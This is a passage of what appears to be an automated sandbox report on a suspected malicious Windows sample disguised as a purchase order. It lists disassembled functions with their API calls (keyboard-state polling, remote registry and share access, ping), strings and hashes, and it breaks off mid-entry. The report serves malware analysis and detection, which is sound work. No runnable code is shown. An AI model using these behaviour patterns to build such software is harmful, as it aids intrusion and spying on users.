                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: SendString$_wcslen
                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                • API String ID: 2420728520-1007645807
                                • Opcode ID: 6466f490cdd02d90104a296621b63d52dbb4a838e671d42eae625ca75735855c
                                • Instruction ID: 02e5f37ec66adec7f56aed0b63ca405075908daf2cbc269bf4993a754cb72b87
                                • Opcode Fuzzy Hash: 6466f490cdd02d90104a296621b63d52dbb4a838e671d42eae625ca75735855c
                                • Instruction Fuzzy Hash: 7E115431A50259BAD710A7A1DC4ADFF6ABCEBE2B44F400429B821A70D1DF701999C5B0
                                Function 00168BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00168F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00168BE8,?,00000000,?,?,?,?,00168BBA,00000000,?), ref: 00168FC5
                                • DestroyWindow.USER32(?), ref: 00168C81
                                • KillTimer.USER32(00000000,?,?,?,?,00168BBA,00000000,?), ref: 00168D1B
                                • DestroyAcceleratorTable.USER32(00000000), ref: 001A6973
                                • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00168BBA,00000000,?), ref: 001A69A1
                                • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00168BBA,00000000,?), ref: 001A69B8
                                • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00168BBA,00000000), ref: 001A69D4
                                • DeleteObject.GDI32(00000000), ref: 001A69E6
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                • String ID:
                                • API String ID: 641708696-0
                                • Opcode ID: 1ec6eda0ddf23a7c79e96976abe0e8ef65044d5ce10e54a59839f2161630bf14
                                • Instruction ID: 2484baa8373aab9d9dfb2bdb719269d21726a97cca42459797a11b5def6ff1c9
                                • Opcode Fuzzy Hash: 1ec6eda0ddf23a7c79e96976abe0e8ef65044d5ce10e54a59839f2161630bf14
                                • Instruction Fuzzy Hash: 3161AA35502700EFCB359F64DD98B6AB7F1FB65316F145618E0429B960CB31A8E2CBA1
                                Function 00169838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00169944: GetWindowLongW.USER32(?,000000EB), ref: 00169952
                                • GetSysColor.USER32(0000000F), ref: 00169862
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ColorLongWindow
                                • String ID:
                                • API String ID: 259745315-0
                                • Opcode ID: 1cff851c32d916beb631d83b3fc2ba3dc9246a1ca9c3076d36517eb0d2d4ddf5
                                • Instruction ID: 1217693e04c5ee152832095e56ca4c860b89f30e4fe8b459753f5f3ee5dab72e
                                • Opcode Fuzzy Hash: 1cff851c32d916beb631d83b3fc2ba3dc9246a1ca9c3076d36517eb0d2d4ddf5
                                • Instruction Fuzzy Hash: 23419E31504684EFDB205F789C88BBA3BADAB47330F144619F9A28B1E1D7319D92DB50
                                Function 001B96E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0019F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 001B9717
                                • LoadStringW.USER32(00000000,?,0019F7F8,00000001), ref: 001B9720
                                  • Part of subcall function 00159CB3: _wcslen.LIBCMT ref: 00159CBD
                                • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0019F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 001B9742
                                • LoadStringW.USER32(00000000,?,0019F7F8,00000001), ref: 001B9745
                                • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 001B9866
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: HandleLoadModuleString$Message_wcslen
                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                • API String ID: 747408836-2268648507
                                • Opcode ID: 071452d405d52e26e91f4bd9f925f76a906498b15df47602f8170cd884593c34
                                • Instruction ID: e1f1c025bb7d0780bb62b89cdd62c2d3f49248572ed3d7e59db53190ad649068
                                • Opcode Fuzzy Hash: 071452d405d52e26e91f4bd9f925f76a906498b15df47602f8170cd884593c34
                                • Instruction Fuzzy Hash: ED413C7280021DEACF14EBE0DD86DEE7779AF25341F500065FA157A092EB356F49CBA1
                                Function 001B06DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00156B57: _wcslen.LIBCMT ref: 00156B6A
                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 001B07A2
                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 001B07BE
                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 001B07DA
                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 001B0804
                                • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 001B082C
                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 001B0837
                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 001B083C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                • API String ID: 323675364-22481851
                                • Opcode ID: ce4973bae295c3564bee1d718aa577c969757c4d9d284924b85acdc7af21c940
                                • Instruction ID: 00c5535d042c9921350b5755f4c8305ec752e7450b33a897d962b13103482d21
                                • Opcode Fuzzy Hash: ce4973bae295c3564bee1d718aa577c969757c4d9d284924b85acdc7af21c940
                                • Instruction Fuzzy Hash: 57410772C1022DEBCF15EBA4DC958EEB7B8BF58350B444169F911AB161EB309E48CB90
                                Function 001D3C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                Download Yara Rule
                                APIs
                                • VariantInit.OLEAUT32(?), ref: 001D3C5C
                                • CoInitialize.OLE32(00000000), ref: 001D3C8A
                                • CoUninitialize.OLE32 ref: 001D3C94
                                • _wcslen.LIBCMT ref: 001D3D2D
                                • GetRunningObjectTable.OLE32(00000000,?), ref: 001D3DB1
                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 001D3ED5
                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 001D3F0E
                                • CoGetObject.OLE32(?,00000000,001EFB98,?), ref: 001D3F2D
                                • SetErrorMode.KERNEL32(00000000), ref: 001D3F40
                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D3FC4
                                • VariantClear.OLEAUT32(?), ref: 001D3FD8
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                • String ID:
                                • API String ID: 429561992-0
                                • Opcode ID: 55f4faa9a142e70f32f42ebb0e0f52a895ffb4ea349b9a57e24e70a7653eae97
                                • Instruction ID: b3c89a55e26e99e775d534a3ae951f3c15edf3a68ddaa2239f9453e028731bee
                                • Opcode Fuzzy Hash: 55f4faa9a142e70f32f42ebb0e0f52a895ffb4ea349b9a57e24e70a7653eae97
                                • Instruction Fuzzy Hash: 08C133716082059FD700DF68C88496BB7E9FF89748F14491EF99A9B250D730EE46CB92
                                Function 001C7A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                Download Yara Rule
                                APIs
                                • CoInitialize.OLE32(00000000), ref: 001C7AF3
                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 001C7B8F
                                • SHGetDesktopFolder.SHELL32(?), ref: 001C7BA3
                                • CoCreateInstance.OLE32(001EFD08,00000000,00000001,00216E6C,?), ref: 001C7BEF
                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 001C7C74
                                • CoTaskMemFree.OLE32(?,?), ref: 001C7CCC
                                • SHBrowseForFolderW.SHELL32(?), ref: 001C7D57
                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 001C7D7A
                                • CoTaskMemFree.OLE32(00000000), ref: 001C7D81
                                • CoTaskMemFree.OLE32(00000000), ref: 001C7DD6
                                • CoUninitialize.OLE32 ref: 001C7DDC
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                • String ID:
                                • API String ID: 2762341140-0
                                • Opcode ID: 84c731476429e10247393b4bfd1fe0a3c3f09f4f9d2c94f11bae515ef355ed2e
                                • Instruction ID: 00f931a8079ca45e1618bee603a9d069ef4387307a83f7f701c2944ccce73a14
                                • Opcode Fuzzy Hash: 84c731476429e10247393b4bfd1fe0a3c3f09f4f9d2c94f11bae515ef355ed2e
                                • Instruction Fuzzy Hash: 2BC10975A04109EFCB14DFA4C884EAEBBF9FF58304B148499E81A9B661D770EE45CF90
                                Function 001E541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 001E5504
                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001E5515
                                • CharNextW.USER32(00000158), ref: 001E5544
                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 001E5585
                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 001E559B
                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001E55AC
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageSend$CharNext
                                • String ID:
                                • API String ID: 1350042424-0
                                • Opcode ID: d8d359b3c944f9d770401aaac1613ac68531bd924f783580325ee42b7905436c
                                • Instruction ID: 32101e79f093324e8bbafb7bcab77169bfba30422f68549bffd7ee1ed6d92dd6
                                • Opcode Fuzzy Hash: d8d359b3c944f9d770401aaac1613ac68531bd924f783580325ee42b7905436c
                                • Instruction Fuzzy Hash: D1619034900A89EFDF108F96CC84DFE7BBAEF09728F144145F925AB291D7748A81DB61
                                Function 001AFA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 001AFAAF
                                • SafeArrayAllocData.OLEAUT32(?), ref: 001AFB08
                                • VariantInit.OLEAUT32(?), ref: 001AFB1A
                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 001AFB3A
                                • VariantCopy.OLEAUT32(?,?), ref: 001AFB8D
                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 001AFBA1
                                • VariantClear.OLEAUT32(?), ref: 001AFBB6
                                • SafeArrayDestroyData.OLEAUT32(?), ref: 001AFBC3
                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001AFBCC
                                • VariantClear.OLEAUT32(?), ref: 001AFBDE
                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001AFBE9
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                • String ID:
                                • API String ID: 2706829360-0
                                • Opcode ID: 99fd3ee76717eb4a2f2eb8879ddc951686047fa752d5c48f2b3f37f4b27c3b3d
                                • Instruction ID: 4afe7de2c2263cb75fbb847ad64e3d4d71254cd5f565be7edb3790a241e0ad45
                                • Opcode Fuzzy Hash: 99fd3ee76717eb4a2f2eb8879ddc951686047fa752d5c48f2b3f37f4b27c3b3d
                                • Instruction Fuzzy Hash: D5414175A00219DFCB04DFA8DC94DEEBBB9FF59344F008069F955AB661C730A946CBA0
                                Function 001B9C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                Download Yara Rule
                                APIs
                                • GetKeyboardState.USER32(?), ref: 001B9CA1
                                • GetAsyncKeyState.USER32(000000A0), ref: 001B9D22
                                • GetKeyState.USER32(000000A0), ref: 001B9D3D
                                • GetAsyncKeyState.USER32(000000A1), ref: 001B9D57
                                • GetKeyState.USER32(000000A1), ref: 001B9D6C
                                • GetAsyncKeyState.USER32(00000011), ref: 001B9D84
                                • GetKeyState.USER32(00000011), ref: 001B9D96
                                • GetAsyncKeyState.USER32(00000012), ref: 001B9DAE
                                • GetKeyState.USER32(00000012), ref: 001B9DC0
                                • GetAsyncKeyState.USER32(0000005B), ref: 001B9DD8
                                • GetKeyState.USER32(0000005B), ref: 001B9DEA
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: State$Async$Keyboard
                                • String ID:
                                • API String ID: 541375521-0
                                • Opcode ID: 91ea4c7d8fdc298655e952c339eae9cb3fcea6364138f5d996f8e2fb97abf660
                                • Instruction ID: a0037fca92a5cdf4cf5dc20a4c4ba3f63520da8c8e2f8bcc027352eb09982a7d
                                • Opcode Fuzzy Hash: 91ea4c7d8fdc298655e952c339eae9cb3fcea6364138f5d996f8e2fb97abf660
                                • Instruction Fuzzy Hash: 4741F8346047CA6DFF3197A1C8443F5BEB06F15344F44805ADBC65A6C2DBA4A9CACBA2
                                Function 001D055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                Download Yara Rule
                                APIs
                                • WSAStartup.WSOCK32(00000101,?), ref: 001D05BC
                                • inet_addr.WSOCK32(?), ref: 001D061C
                                • gethostbyname.WSOCK32(?), ref: 001D0628
                                • IcmpCreateFile.IPHLPAPI ref: 001D0636
                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 001D06C6
                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 001D06E5
                                • IcmpCloseHandle.IPHLPAPI(?), ref: 001D07B9
                                • WSACleanup.WSOCK32 ref: 001D07BF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                • String ID: Ping
                                • API String ID: 1028309954-2246546115
                                • Opcode ID: efb1c5d1d7b8e2a21c8166785f9904c725c4be18785803f034b68c3b1c8834b7
                                • Instruction ID: 58194f9d0007fd674435a1c6157beaeea044071dd070097ae3f2063987b2d907
                                • Opcode Fuzzy Hash: efb1c5d1d7b8e2a21c8166785f9904c725c4be18785803f034b68c3b1c8834b7
                                • Instruction Fuzzy Hash: F3918D35604241DFD321CF15D888F1ABBE0AF48318F1585AAE8A98F7A2C730ED85CF91
                                Function 001D8CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _wcslen$BuffCharLower
                                • String ID: cdecl$none$stdcall$winapi
                                • API String ID: 707087890-567219261
                                • Opcode ID: 97e319cc1f4d1c63df0c3dc43182b8fd5bd714363d02bb423b07143cc3c0fd47
                                • Instruction ID: 5f0982ae894e8238029aeefaaa77e074638e24d98e989f3428fa7595c8818f0b
                                • Opcode Fuzzy Hash: 97e319cc1f4d1c63df0c3dc43182b8fd5bd714363d02bb423b07143cc3c0fd47
                                • Instruction Fuzzy Hash: 2F518F31A005169BCB14DFACC9519BEB7B6BF64724B21422AE926EB3C5DB31DD40CB90
                                Function 001D372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                Download Yara Rule
                                APIs
                                • CoInitialize.OLE32 ref: 001D3774
                                • CoUninitialize.OLE32 ref: 001D377F
                                • CoCreateInstance.OLE32(?,00000000,00000017,001EFB78,?), ref: 001D37D9
                                • IIDFromString.OLE32(?,?), ref: 001D384C
                                • VariantInit.OLEAUT32(?), ref: 001D38E4
                                • VariantClear.OLEAUT32(?), ref: 001D3936
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                • API String ID: 636576611-1287834457
                                • Opcode ID: 9c83d2a611db53ae24541c2af9155f7269e934a0d7f53a395be7228d0851d08b
                                • Instruction ID: a01d85e0f76755317210e505bc02e54ef19713a25eea21aaa94ba7c70586d895
                                • Opcode Fuzzy Hash: 9c83d2a611db53ae24541c2af9155f7269e934a0d7f53a395be7228d0851d08b
                                • Instruction Fuzzy Hash: CA61BD71608701AFD311DF54D889FAAB7E4AF59710F00090AF9A59B391D770EE49CB93
                                Function 001E8B02 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00169BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00169BB2
                                  • Part of subcall function 0016912D: GetCursorPos.USER32(?), ref: 00169141
                                  • Part of subcall function 0016912D: ScreenToClient.USER32(00000000,?), ref: 0016915E
                                  • Part of subcall function 0016912D: GetAsyncKeyState.USER32(00000001), ref: 00169183
                                  • Part of subcall function 0016912D: GetAsyncKeyState.USER32(00000002), ref: 0016919D
                                • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 001E8B6B
                                • ImageList_EndDrag.COMCTL32 ref: 001E8B71
                                • ReleaseCapture.USER32 ref: 001E8B77
                                • SetWindowTextW.USER32(?,00000000), ref: 001E8C12
                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 001E8C25
                                • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 001E8CFF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                • String ID: @GUI_DRAGFILE$@GUI_DROPID$p#"
                                • API String ID: 1924731296-2850516425
                                • Opcode ID: 83fab252cec3328a2eb6d7080560761f50b1c2eeb09d2722d2188651829086d4
                                • Instruction ID: 3e0c6a8953a3e9a0e06c11d54fddd6730b40579ecf740f71b3d06bee87feed5c
                                • Opcode Fuzzy Hash: 83fab252cec3328a2eb6d7080560761f50b1c2eeb09d2722d2188651829086d4
                                • Instruction Fuzzy Hash: 2B51BA70104340AFD700DF54DC9AFAE77E4FB99714F000629F956AB2E1CB709959CBA2
                                Function 001C3388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                Download Yara Rule
                                APIs
                                • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 001C33CF
                                  • Part of subcall function 00159CB3: _wcslen.LIBCMT ref: 00159CBD
                                • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 001C33F0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
